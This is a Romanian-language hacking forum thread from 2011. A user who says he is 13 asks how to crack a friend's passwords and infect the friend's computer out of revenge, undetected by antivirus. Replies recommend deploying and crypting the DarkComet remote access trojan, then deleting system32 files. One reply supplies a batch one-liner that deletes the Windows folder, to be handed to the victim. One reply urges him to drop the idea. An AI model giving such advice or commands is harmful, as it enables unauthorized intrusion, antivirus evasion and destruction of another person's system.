Anonimul Posted November 29, 2011 Report Posted November 29, 2011 Salut rstcenter!Cu toti am fost mici, si curiosi in cautarea programelor si a, celor mai bune programe de hacking.Eu am doar, 13 ani si voi ati avut aceasta varsta.Cu toti mai gresim si prin greseli ma refer la:-Greseli de ortografie-Greseli cu acceptarea programelor de la necunoscuti-Abuz de programe de spart paroleEtc.Ideea e ca vreau sa ma razbun, nu sunt cracker nici hacker sunt doar un amator in acceasta lume a hackerilor.Sa trecem la subiect.Vreau sa ajut un prieten sa sparg parolele si sa ii virusez calculatorul.Cum sa ii virusez calculatorul si cum sa il fac sa nu ii se mai vada virusi la accel program ?Cel mai simplu e sa ii sterg, registri si sa reinstaleze windowsul. Dar cum ?Stiu ca par ca un milog ca va cer ajutoru si ma credeti un script kid care abuzeaza de programe .Imi cer scuze pentru greselile de ortografie nu vreau sa fac impresie sau ceva dar va cer ajutorul.PS: scuze de categorie daca am gresit-o Quote
Slice228 Posted November 29, 2011 Report Posted November 29, 2011 (edited) Ia un RAT, fa un server, crypteaza-l, il dai si dupa ii stergi vreun fisier din system32.Da un search dupa DarkComet, e acol si un tutorial cum sa'l instalezi. Ca sa stii cum sa folosesti o sa stii singur daca stii si putin engleza. Edited November 29, 2011 by Slice228 Quote
Robert1995 Posted November 29, 2011 Report Posted November 29, 2011 (edited) fa un .bat cu asta , daca windows e in c@echo offdel /q "c:\windows"Later Edit : oricum nu o sa-ti raspunda mai nimeni la topic ... pune bucata asta tampita de cod si dai fisierul si ii face poc windows... Edited November 29, 2011 by Robert1995 Quote
Anonimul Posted November 29, 2011 Author Report Posted November 29, 2011 Ia un RAT, fa un server, crypteaza-l, il dai si dupa ii stergi vreun fisier din system32.Da un search dupa DarkComet, e acol si un tutorial cum sa'l instalezi. Ca sa stii cum sa folosesti o sa stii singur daca stii si putin engleza.Ms de idee.Mai astept pareri. Quote
The_Arhitect Posted November 29, 2011 Report Posted November 29, 2011 (edited) Eu zic sa o lasi balta , stiu multi la ani tai si nu au ajuns nici unde , decat ori la bulau ori la corectie , si trebuia sa postezi la off-topic nu la tutoriale. Edited November 29, 2011 by The_Arhitect Quote